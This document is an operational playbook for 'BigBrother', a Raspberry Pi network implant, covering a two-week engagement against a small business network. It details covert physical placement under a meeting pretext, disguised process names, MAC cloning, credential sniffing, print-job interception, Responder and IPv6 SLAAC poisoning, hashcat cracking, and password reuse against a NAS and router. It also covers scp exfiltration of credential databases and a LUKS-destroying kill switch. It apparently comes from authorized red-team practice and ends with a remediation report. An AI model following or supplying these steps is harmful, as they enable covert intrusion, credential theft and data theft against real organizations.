19 KiB
BigBrother: Operational Workflow
Scenario: 2-week engagement on a small business network Target: 15 users, flat 10.0.1.0/24 network, no Active Directory, consumer router (Netgear Nighthawk), Synology NAS, 2 network printers (HP LaserJet), assorted IoT (Nest thermostat, Ring doorbell, Sonos speakers), mix of Windows 10/11 and macOS endpoints Hardware: Raspberry Pi 4 (4GB), 128GB industrial SD card, USB Ethernet adapter Deployment: Inline bridge behind front desk switch port
Pre-Deployment (Before You Arrive)
Hardware Prep (2-3 hours at your workstation)
1. Flash the SD card
Flash Raspberry Pi OS Lite (64-bit, Bookworm) to the 128GB card. Boot it once on your bench, connect via HDMI/keyboard, and run setup.
# On the Pi, first boot
sudo raspi-config # enable SSH, set locale, disable desktop
cd /opt
sudo git clone <your-bigbrother-repo> .cache/bb
cd .cache/bb
sudo ./setup.sh --tier pi4
setup.sh takes 30-45 minutes. Installs all packages, venv, tool binaries, wordlists, LUKS, systemd services, kernel tuning. Everything pre-bundled so the Pi never fetches packages on target.
2. Configure the engagement
sudo bigbrother config --init
# storage/config/engagement.yaml
engagement:
name: "op-acme-retail"
client: "Acme Office Supply"
# storage/config/connectivity.yaml
tailscale:
auth_key: "tskey-auth-kExAmPlE-0123456789abcdef"
hostname: "iot-sensor-03"
3. Tailscale pre-auth key: Admin console, single-use, tagged tag:implant, 90-day expiry.
4. Set MAC and hostname:
sudo bigbrother config set device.hostname "iot-sensor-03"
sudo bigbrother config set stealth.mac_clone "Dell" # Random Dell OUI, DHCP vendor class matches
5. Test kill switch: sudo bigbrother kill --dry-run -- verify on throwaway SD image.
6. Pack: Pi 4 (plain black case), USB-C 5V/3A PSU, USB Ethernet adapter, 2x 0.5m patch cables, scope doc (paper only).
Day 0: Drop
Physical Deployment (10-15 minutes on target)
On-site for a "network assessment kickoff meeting." Physical access available. Place inline between front desk wall jack and desktop -- cable run behind/under desk, no one inspects ethernet cables.
- Unplug ethernet from front desk PC's wall jack
- Wall jack cable into Pi's onboard eth0 (uplink)
- USB Ethernet adapter from Pi to front desk PC
- USB-C power in
- Wait 30 seconds for boot, tuck Pi behind monitor
- Verify front desk PC has connectivity (bridge is transparent)
Cable time: under 2 minutes. Remainder is positioning.
What Happens on Boot (~90 seconds)
- Bridge -- Transparent bridge eth0/eth1, cloned Dell MAC, STP/CDP/LLDP suppressed
- Core (disguised: "System Thermal Management Daemon") -- Engine up, LUKS mounted, state DB init
- Capture -- AF_PACKET promiscuous on bridge, packets flowing
- Passive -- All 22 modules start, subscribe to capture bus
- Tailscale -- Pre-auth key, joins tailnet as
iot-sensor-03 - Watchdog -- Monitors and auto-restarts crashed modules
- Baseline --
traffic_mimicrybegins 48-hour traffic profiling
First Check-In (15-30 min after drop)
From hotel/car: ssh operator@iot-sensor-03
sudo bigbrother selftest
[+] Platform: Pi 4 (4GB) SD: 128GB (112GB free) LUKS: mounted
[+] Bridge: eth0↔eth1 (transparent) Capture: 247 pps
[+] Passive: 22/22 running Active: 0/14 (PASSIVE_ONLY)
[+] Tailscale: UP (100.64.0.17) Temp: 42C RAM: 48%
[+] Kill switch: armed
All green. Disconnect, let it cook.
Day 1: First Check-In (24 Hours of Passive Collection)
ssh operator@iot-sensor-03
sudo bigbrother status
╭────────────────── BigBrother Status ─────────────────╮
│ op-acme-retail Uptime: 23h 47m Phase: PASSIVE_ONLY│
│ Pi 4 (4GB) Temp: 44C Disk: 109GB free │
│ Tailscale: UP Bridge: eth0↔eth1 Packets: 4.2M │
│ │
│ Passive (22/22 running): │
│ packet_capture CPU 8% 62MB PCAPs: 47 │
│ dns_logger CPU 1% 14MB Queries: 31K │
│ tls_sni CPU 1% 11MB SNIs: 18K │
│ cred_sniffer CPU 2% 19MB Creds: 3 │
│ kerberos_harvest CPU 0% 12MB Tickets: 0 │
│ host_discovery CPU 1% 14MB Hosts: 23 │
│ traffic_analyzer CPU 3% 38MB Flows: 8.2K │
│ print_intercept CPU 0% 12MB Jobs: 7 │
│ ... (remaining nominal) │
│ Active: locked until Day 7 │
│ Baseline: COLLECTING (24h / 48h) │
╰──────────────────────────────────────────────────────╯
sudo bigbrother triage
╭───────────────── Triage Report (24h) ────────────────╮
│ ── Hosts (23 discovered) ── │
│ 10.0.1.1 Netgear router (gateway) │
│ 10.0.1.10 Dell FRONT-DESK Windows 11 │
│ 10.0.1.11 Apple MacBook-Sarah macOS 14 │
│ 10.0.1.12 Dell ACCT-PC-01 Windows 10 │
│ 10.0.1.13 Dell ACCT-PC-02 Windows 10 │
│ 10.0.1.14 Apple MacBook-Tom macOS 14 │
│ 10.0.1.15 Dell MANAGER-PC Windows 11 │
│ 10.0.1.20 Synology DiskStation Linux │
│ 10.0.1.30 HP PRINTER-MAIN JetDirect │
│ 10.0.1.31 HP PRINTER-BACK JetDirect │
│ 10.0.1.40 Nest Labs thermostat │
│ 10.0.1.41 Ring doorbell │
│ 10.0.1.42-43 Sonos speakers (x2) │
│ ... +9 phones/tablets/laptops │
│ │
│ ── DNS (31,247 queries, 1,847 unique domains) ── │
│ All via 10.0.1.1 → 8.8.8.8 (no internal DNS) │
│ Top: ocsp.digicert.com, login.microsoftonline.com, │
│ outlook.office365.com, quickbooks.intuit.com, │
│ diskstation.local (mDNS), ring-api.com │
│ ⚠ DoH: 3 hosts using 8.8.8.8:443 (partial blind) │
│ │
│ ── Credentials (3) ── │
│ SNMP "public" → 10.0.1.30, 10.0.1.31 (printers) │
│ HTTP Basic admin:admin123 → 10.0.1.1:80 (router) │
│ │
│ ── Kerberos: None (no AD) ── │
│ ── Print Jobs: 7 (ACCT-PC, MANAGER-PC, FRONT-DESK) ─│
│ ── Topology: flat L2, no VLANs, no 802.1X/NAC ── │
│ ── Security: No EDR/SIEM/IDS — Defender only ── │
│ ── Anomalies: None ── │
╰──────────────────────────────────────────────────────╯
Assessment
Zero security infrastructure. No EDR, SIEM, IDS, NAC, or AD. Router admin creds captured passively in cleartext. Synology NAS is the central file server (8 hosts connect over SMB). M365 for email (cloud, nothing to sniff on-prem). Kerberos harvester will produce zero all engagement (no AD). Three DoH hosts create partial DNS blind spot.
Operator decisions: Keep passive, baseline not finished. Note router creds and NAS as high-value target. Review print jobs on Day 3.
Day 3: Deep Review
DNS Analysis (72 hours)
sudo bigbrother intel dns --top 50 --by-host
Patterns: Standard SaaS stack (M365, QuickBooks, Dropbox, Slack). NAS resolved via mDNS. IoT devices beacon constantly (Ring: 200+ queries/day to AWS). Personal browsing mixed in. No security tool updates, no VPN client traffic. No internal DNS server -- everything forwards through router to 8.8.8.8.
Credential Review
Still 3 credentials (passive only). On a modern encrypted network with no AD, passive credential capture is metadata-level. The cleartext sniffer only catches protocols that still use plaintext: router HTTP admin, printer SNMP.
Network Topology
sudo bigbrother topology --render
[Internet]
|
[10.0.1.1 Router]
|
┌─────────────┼──────────────┐
| | |
[Workstations] [10.0.1.20 NAS] [IoT 40-43]
10.0.1.10-15 (SMB + HTTPS)
|
[Printers 30-31]
Flat L2, no segmentation. NAS serves 8 hosts over SMB. Printers accept unencrypted JetDirect from 6 hosts.
Security Posture
Windows Defender (built-in, unmanaged) on 6 hosts. No EDR, no SIEM, no IDS, no NAC, no management agents. Local accounts everywhere. Detection risk for active modules: LOW.
Print Jobs
sudo bigbrother intel prints --list
11 jobs captured over 3 days. ACCT-PC-01 and MANAGER-PC print to PRINTER-MAIN (port 9100, unencrypted). Ghostscript converts captured PCL/PostScript to PDF:
sudo bigbrother intel prints --view 3
# QuickBooks invoice — customer names, amounts, account numbers
JetDirect is always unencrypted. Print interception on small business networks is consistently high-value.
Traffic Analysis
sudo bigbrother intel traffic --beacons
No suspicious beacons. Known periodic traffic: Windows Update (4h), Ring (30s to AWS), Nest (60s), Sonos (5m), Slack WebSocket (30s). Clean network, no prior compromise.
Operator Decision
After 3 days: 23 hosts inventoried, router admin creds, full DNS history, 11 print jobs with financial data, zero security monitoring, baseline complete.
Decision: Go active on Day 5. Network has zero detection capability. Start with Responder -- highest-yield, lowest-noise active technique for NTLMv2 capture on Windows networks.
Day 5: Going Active
Why Responder First
Windows machines use LLMNR/NBT-NS for name resolution fallback even without AD. Mistyped hostnames, stale mapped drives, and WPAD lookups all broadcast queries. Responder answers them and captures NTLMv2 challenge-response hashes. Lower risk than ARP spoofing (no cache changes), produces crackable hashes without MITM position.
Activate Responder
sudo bigbrother activate responder_mgr
[*] Phase: ACTIVE_ALLOWED (Day 5) Posture: No IDS/EDR — LOW risk
[*] IDS self-test: No Responder signatures matched
[+] Responder active (LLMNR + NBT-NS + mDNS poisoning)
Credential Flow
sudo bigbrother creds --since "2h ago"
╭──────────── New Credentials (last 2h) ───────────────╮
│ ID Type Username Hash (truncated) Source │
│ 4 NTLMv2 sarah.m SARAH.M::ACME:... LLMNR │
│ 5 NTLMv2 tsmith TSMITH::FRONT-D:... NBT-NS│
│ 6 NTLMv2 admin.local ADMIN.LOCAL::MAN... LLMNR │
╰──────────────────────────────────────────────────────╯
Three NTLMv2 hashes in 2 hours. Typical for a small network. These are machine-local account hashes (no AD -- users authenticate with local accounts to the NAS and each other's shares).
Crack the Hashes
Pi 4 CPU is too slow for serious cracking. Push to your workstation:
sudo bigbrother creds --export hashcat --type ntlmv2 > /tmp/ntlmv2.txt
scp /tmp/ntlmv2.txt operator@your-workstation:/tmp/
# On workstation: hashcat -m 5600 /tmp/ntlmv2.txt rockyou.txt -r OneRuleToRuleThemAll.rule
Expect 50-70% crack rate on a small business. Simple passwords, predictable patterns.
Detection Check + IPv6 SLAAC
sudo bigbrother intel posture --changes # No changes, no one watching
sudo bigbrother activate ipv6_slaac # Become IPv6 gateway, WPAD abuse
IPv6 SLAAC makes the Pi the IPv6 default gateway. Windows hosts route IPv6 DNS through the implant, catching additional NTLM auth via WPAD. No RA Guard on consumer networks.
Day 7-10: Active Collection Running
Credential Growth
sudo bigbrother creds --stats
╭──────────── Credential Stats (Day 7) ───────────────╮
│ Total: 18 Unique users: 9 │
│ NTLMv2: 12 (8 cracked / 4 uncracked — 67%) │
│ HTTP Basic: 1 | SNMP: 2 | HTTP POST: 3 │
│ │
│ Source: Responder LLMNR 7, NBT-NS 3, SLAAC/WPAD 2, │
│ Passive 6 (SNMP, HTTP Basic, Synology DSM) │
│ │
│ Cracked: │
│ sarah.m:Flowers2024! tsmith:Welcome1 │
│ admin.local:Acme2023! jrodriguez:Summer2024 │
│ kpatel:Password1! bwilson:Bwilson123 │
│ lchen:Dragon2024 mthompson:Qwerty123! │
╰──────────────────────────────────────────────────────╯
IPv6 SLAAC + DNS poisoning redirected Synology DSM logins over HTTP -- 3 NAS passwords captured in cleartext, several reused from NTLMv2 hashes.
Manual Recon from Jump Box
SSH in and use pre-installed tools directly.
# NAS access with cracked admin.local password
smbmap -H 10.0.1.20 -u admin.local -p 'Acme2023!'
[+] IP: 10.0.1.20 Name: DiskStation
homes READ,WRITE accounting READ,WRITE
shared READ,WRITE backups READ ONLY
smbclient //10.0.1.20/accounting -U admin.local%'Acme2023!'
smb: \> ls
2024_returns/ 2025_returns/ payroll/
invoices/ bank_statements/ passwords.xlsx # Classic.
# Router — full admin access with Day 1 creds
curl -s -u admin:admin123 http://10.0.1.1/api/get_info | python3 -m json.tool
# Returns: firmware, WAN IP, DHCP leases, port forwards, WiFi PSK
# Password reuse testing
netexec ssh 10.0.1.20 -u sarah.m -p 'Flowers2024!'
# [+] sarah.m:Flowers2024! — NTLMv2 password works on NAS SSH
Change Detection
sudo bigbrother intel changes --since "Day 0"
New hosts: +2 (phones, WiFi) Lost: -1 (MacBook-Tom offline Day 6)
New services: None Scan activity: None Verdict: No IR activity
Day 14: Wrap-Up
Final Credentials
sudo bigbrother creds --stats --full
Total: 24 | Unique users: 11/15 (73%) | Password reuse: 7
NTLMv2: 14 (10 cracked) | HTTP Basic: 1 | SNMP: 2
HTTP POST: 4 (Synology DSM) | WiFi PSK: 1 | SSH keys: 2
Admin access obtained: Router (full), NAS (all shares + SSH),
6 workstations (local admin via password reuse)
Pull Data
sudo bigbrother intel report --format html --output /tmp/report/
scp -r operator@iot-sensor-03:/tmp/report/ ./acme-report/
# Raw artifacts
scp operator@iot-sensor-03:/opt/.cache/bb/storage/creds/credentials.db ./
scp operator@iot-sensor-03:/opt/.cache/bb/storage/pcaps/cred_ring_*.pcap.zst.enc ./
scp -r operator@iot-sensor-03:/opt/.cache/bb/storage/print_jobs/ ./
scp -r operator@iot-sensor-03:/opt/.cache/bb/storage/dns_logs/ ./
scp -r operator@iot-sensor-03:/opt/.cache/bb/storage/audit/ ./ # Legal protection
Retrieval
On-site: unplug power, reconnect front desk PC to wall jack, verify connectivity, take the Pi. Total: 2 minutes.
Kill Switch (if not retrieving)
sudo bigbrother kill # Passphrase confirmation required
[*] Destroying LUKS header... (milliseconds — data unrecoverable)
[*] Shredding keys + credential DB...
[*] Zeroing data partition... Clearing RAM... Rebooting.
Example Report Outline
Executive Summary
Over 14 days of authorized network monitoring, 73% of user accounts were compromised and full admin access was obtained to the router and central file server -- without triggering any alerts.
Findings (12 total)
| # | Severity | Finding | Remediation |
|---|---|---|---|
| 1 | CRIT | Router admin creds in cleartext HTTP (admin:admin123) |
HTTPS-only admin, change password |
| 2 | CRIT | NAS full access via reused passwords (accounting, payroll, bank data) | Unique passwords, NAS 2FA, least privilege |
| 3 | CRIT | passwords.xlsx on shared drive (banking, vendor creds in plaintext) |
Password manager, delete file |
| 4 | HIGH | No network segmentation (IoT, printers, NAS on same L2) | VLANs: separate IoT from business |
| 5 | HIGH | Unencrypted print traffic (financial docs with PII intercepted) | IPP-over-TLS or replace printers |
| 6 | HIGH | Weak passwords (67% cracked, Word####! patterns) |
14+ char policy, password manager |
| 7 | HIGH | No endpoint management (Defender only, no MDM/patching) | M365 Business Premium + Intune |
| 8 | MED | SNMP default public on both printers |
Change community string or disable |
| 9 | MED | No network monitoring (implant ran 14 days undetected) | Router logging + syslog collector |
| 10 | MED | IoT on business network (known vulns, no endpoint protection) | Separate VLAN/guest network |
| 11 | LOW | WiFi PSK visible from router admin panel | Fixed by #1 |
| 12 | LOW | DoH on 3 hosts bypasses DNS monitoring | Note for future architecture |
Summary: Critical 3, High 4, Medium 3, Low 2
What Produced Zero Results
| Module | Why Zero |
|---|---|
| kerberos_harvester | No AD, no Kerberos |
| ldap_harvester | No AD, no LDAP |
| rdp_monitor | No RDP in use |
| email_sniffer | M365 is all TLS |
| voip_capture | No VoIP (cell phones) |
| vlan_discovery | Flat network |
| db_interceptor | No database servers |
| cloud_token_harvester | All cloud traffic encrypted |
| smb_monitor (content) | SMB3 encryption on Win 11 |
| auth_flow_tracker | No centralized auth without AD |
On a small business without AD, roughly half the passive modules produce zero. High-value modules for this environment: dns_logger, host_discovery, credential_sniffer, print_interceptor, network_mapper, traffic_analyzer, security_posture. Active modules (responder_mgr, ipv6_slaac) produced the majority of credential captures.
Timing Summary
| Phase | Duration | Key Actions |
|---|---|---|
| Pre-deployment | 2-3 hours | Flash, configure, test |
| Day 0 (Drop) | 10-15 min on site | Physical install, verify bridge, first check-in |
| Day 1 | 30 min remote | Status check, triage review |
| Day 3 | 1-2 hours remote | Deep analysis, decision to go active |
| Day 5 | 30 min remote | Activate Responder + IPv6, monitor |
| Day 7-10 | 2-3 hours remote (spread across days) | Crack hashes, manual recon, NAS access, lateral checks |
| Day 14 | 1 hour remote + 10 min on site | Report gen, data pull, physical retrieval |
| Total operator time | ~8-10 hours over 2 weeks | The implant does the work; the operator makes decisions |